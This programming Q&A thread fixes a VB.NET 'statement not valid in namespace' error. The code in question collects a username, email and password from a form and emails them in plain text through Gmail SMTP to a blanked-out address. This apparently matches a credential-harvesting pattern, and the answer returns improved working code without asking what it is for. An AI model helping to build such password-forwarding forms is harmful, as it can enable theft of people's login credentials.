# Statement Not Valid in namespace error

Tags: vb.net

I have an error in my VB.NET code. The error indicates `statement not valid in namespace`.  Here is my code:

```
    Imports System.Net.Mail
    Public Class Form1
    End Class
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)     Handles Button1.Click
        If TextBox1.Text = "" Then
           MsgBox("Username Is Missing")
        Exit Sub
    Else
    End If
    If TextBox2.Text = "" Then
        MsgBox("Email Is Mising")
        Exit Sub
    Else
    End If
    If TextBox3.Text = "" Then
        MsgBox("Password Is Mising")
        Exit Sub
    Else
    End If
    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("", "")
    'using gmail
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    mail = New MailMessage()
    mail.From = New MailAddress("")
    mail.To.Add("")
    mail.Subject = "Username: " & TextBox1.Text
    mail.Body = "Username : " & TextBox1.Text & ", " & "Email: " & TextBox2.Text & ", " & "Passoword: " & TextBox3.Text
    smtpServer.Send(mail)
End Sub
```

Can someone please tell me how to fix this, If so that would be great!

Comment: Methods must appear *inside* a class.  You wrote them *outside* of the class.  Move the `End Class` statement to the bottom.

Answer (score 1):

Your Sub needs to be inside a Class. Also, SmtpClient and MailMessage have .Dispose() methods, which indicates that they need to be disposed of afer use; you can use the Using construction to do that for you automatically. And if there is nothing in an Else clause, you can leave it out:

```
Imports System.Net.Mail
Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        If TextBox1.Text = "" Then
            MsgBox("Username Is missing")
            Exit Sub
        End If

        If TextBox2.Text = "" Then
            MsgBox("Email Is missing")
            Exit Sub
        End If

        If TextBox3.Text = "" Then
            MsgBox("Password Is missing")
            Exit Sub
        End If

        Using smtpServer As New SmtpClient()
            smtpServer.Credentials = New Net.NetworkCredential("", "")
            'using gmail
            smtpServer.Port = 587
            smtpServer.Host = "smtp.gmail.com"
            smtpServer.EnableSsl = True

            Using mail As New MailMessage()
                mail.From = New MailAddress("")
                mail.To.Add("")
                mail.Subject = "Username: " & TextBox1.Text
                mail.Body = "Username: " & TextBox1.Text & ", " & "Email: " & TextBox2.Text & ", " & "Password: " & TextBox3.Text
                smtpServer.Send(mail)
            End Using

        End Using

    End Sub

End Class
```